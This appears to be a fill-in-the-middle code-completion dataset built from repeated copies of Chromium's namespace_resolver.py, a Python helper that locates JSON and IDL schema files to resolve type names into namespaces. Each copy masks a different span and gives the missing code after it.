# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
<|fim_middle|>
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
<|fim_middle|>
<|fim▁end|> | '''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
<|fim_middle|>
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
<|fim_middle|>
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | '''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
<|fim_middle|>
<|fim▁end|> | '''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
<|fim_middle|>
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | basename = UnixName(namespace + '.' + basename) |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
<|fim_middle|>
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | basename = UnixName(namespace) |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
<|fim_middle|>
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace) |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
<|fim_middle|>
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment) |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
  # Try to find the file defining the namespace. E.g. for
  # 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
<|fim_middle|>
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | if full_name not in default_namespace.types:
return None
return default_namespace |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
  # Try to find the file defining the namespace. E.g. for
  # 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
<|fim_middle|>
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | return None |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
  # Try to find the file defining the namespace. E.g. for
  # 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
<|fim_middle|>
return None
<|fim▁end|> | return namespace |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def <|fim_middle|>(full_namespace):
  # Try to find the file defining the namespace. E.g. for
  # 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | _GenerateFilenames |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
  # Try to find the file defining the namespace. E.g. for
  # 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def <|fim_middle|>(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
